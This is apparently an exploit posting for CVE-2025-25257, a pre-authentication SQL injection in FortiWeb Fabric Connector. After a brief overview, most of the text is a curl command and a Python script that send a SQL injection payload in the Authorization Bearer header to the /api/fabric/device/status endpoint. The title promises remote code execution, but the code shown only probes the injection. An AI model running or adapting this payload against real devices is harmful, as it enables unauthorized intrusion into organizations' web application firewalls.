FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution

# Exploit Title: FortiWeb Fabric Connector 7.6.x - Pre-authentication SQL
Injection to Remote Code Execution
# Date: 2025-10-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win, Ubuntu
# CVE : CVE-2025-25257

Overview

CVE-2025-25257 is a pre-authentication SQL Injection vulnerability in
Fortinet FortiWeb Fabric Connector versions 7.0 through 7.6.x.
This flaw allows attackers to inject malicious SQL commands into the
vulnerable API endpoint, potentially leading to Remote Code Execution (RCE).


PoC

curl -k -H "Authorization: Bearer aaa' OR '1'='1" \
  https://<fortiweb-ip>/api/fabric/device/status

PoC Python

import requests

def test_sqli(base_url):
    url = f"{base_url}/api/fabric/device/status"
    headers = {
        "Authorization": "Bearer aaa' OR '1'='1"
    }
    try:
        response = requests.get(url, headers=headers, verify=False,
timeout=10)
        print(f"Status code: {response.status_code}")
        print("Response body:")
        print(response.text)
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="PoC SQLi By Ex3ptionaL
CVE-2025-25257 FortiWeb")
    parser.add_argument("base_url", help="Base URL of FortiWeb (ex:
https://10.0.0.5)")
    args = parser.parse_args()
    test_sqli(args.base_url)
# python3 src/poc.py https://10.0.0.5